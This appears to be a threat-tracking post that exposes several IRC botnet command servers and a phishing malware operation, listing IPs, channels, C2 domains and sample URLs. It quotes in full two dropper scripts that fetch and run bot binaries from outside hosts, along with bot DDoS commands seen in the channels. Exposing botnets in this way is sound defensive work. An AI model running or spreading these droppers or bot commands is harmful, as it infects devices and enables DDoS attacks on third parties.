185.61.138.235 (STD botnet hosted in Ukraine, Kiev, Blazingfast Llc)

Another STD botnet found by abigail.

Server : 185.61.138.235
Port : 443
Channel : #secgod

DDoS coming up:

<~Broken> >bot +std 70.127.120.174 80 30
[STD]Hitting 70.127.120.174!
[STD]Done hitting 70.127.120.174!
<~Broken> >bot +stop
Killing pid 13923.

Other url : http://93.174.93.45/f.sh

#!/bin/sh
cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh
cd /tmp && wget http://93.174.93.45/mox64 && chmod +x mox64 && ./mox64
cd /tmp && wget http://93.174.93.45/momips && chmod +x momips && ./momips
cd /tmp && wget http://93.174.93.45/momipsel && chmod +x momipsel && ./momipsel
cd /tmp && wget http://93.174.93.45/moarm && chmod +x moarm && ./moarm
cd /tmp && wget http://93.174.93.45/moppc && chmod +x moppc && ./moppc
cd /tmp && wget http://93.174.93.45/moi686 && chmod +x moi686 && ./moi686


Hosting infos:
http://whois.domaintools.com/185.61.138.235

191.235.178.122 (Modified Kaiten+STD hosted in Ireland, Dublin, Microsoft Informatica Ltda)

Found by abigail

Server : 191.235.178.122
Port : 443

Channel : #sh

DDoS coming up lol:

<~Haze> >bot +std 172.56.41.67 80 120
[STD]Hitting 172.56.41.67!
[STD]Hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!

The bot can be downloaded here.

Other : http://5.152.206.162/getbinaries.sh

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

rm -fr /var/run/mipsel \
rm -fr /var/run/mips \
rm -fr /var/run/arm \
rm -fr /var/run/ppc \
rm -fr /var/run/powerpc \
rm -fr /var/run/sh4 \
rm -fr /var/run/sh \
rm -fr /var/run/murda \
rm -fr /var/run/x86_64 \
rm -fr /var/run/superh \

wget -c http://5.152.206.162/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://5.152.206.162/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://5.152.206.162/arm -P /var/run && chmod +x /var/run/arm && /var/run/arm
wget -c http://5.152.206.162/ppc -P /var/run && chmod +x /var/run/ppc && /var/run/ppc
wget -c http://5.152.206.162/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4
wget -c http://5.152.206.162/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64
wget -c http://5.152.206.162/linux -P /var/run && chmod +x /var/run/linux && /var/run/linux
sleep 3;
rm -fr /var/run/getbinaries.sh

rm -fr /var/run/mipsel
rm -fr /var/run/mips
rm -fr /var/run/arm
rm -fr /var/run/ppc
rm -fr /var/run/powerpc
rm -fr /var/run/sh4
rm -fr /var/run/sh
rm -fr /var/run/murda
rm -fr /var/run/x86_64
rm -fr /var/run/superh
rm -fr /var/run/getbinaries.sh
Hosting infos :
http://whois.domaintools.com/191.235.178.122

jdsiwiqweiqwyreqwi.com (Phishing malware hosted in Bosnia and Herzegovina, Banja Luka, Blicnet D.o.o.)

Domains used by the malware:

34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com 80.242.123.208


HTTP Requests:

URI:
http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php

DATA:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

samples:
80.242.123.211:888/darky.exe
80.242.123.211:888/1.exe
80.242.123.211:888/run.exe

Hosting infos:
http://whois.domaintools.com/80.242.123.208

89.248.172.240 (30k botnet hosted in Netherlands, Amsterdam, Ecatel Ltd)

Botnet found by sPy.

Only the server and port are listed, no channels, because there was no exe file to examine for more details.
Feel free to check for channels yourself.

Connecting to 89.248.172.240 (6667)

Invisible Users 12: 12 3554
Operators: 2 operator(s) online
Channels: 12 channels formed
Clients: I have 3555 clients and 0 servers
Local users: 3555 29989 Current local users 3555, max 29989
Global users: 3555 15450 Current global users 3555, max 15450

Hosting infos:
http://whois.domaintools.com/89.248.172.240

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities:
hxxp://pastebin.com/dEMULiQV

Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]

The bot is hosted here: hxxp://visionafricamagazine.com/scripts/x.log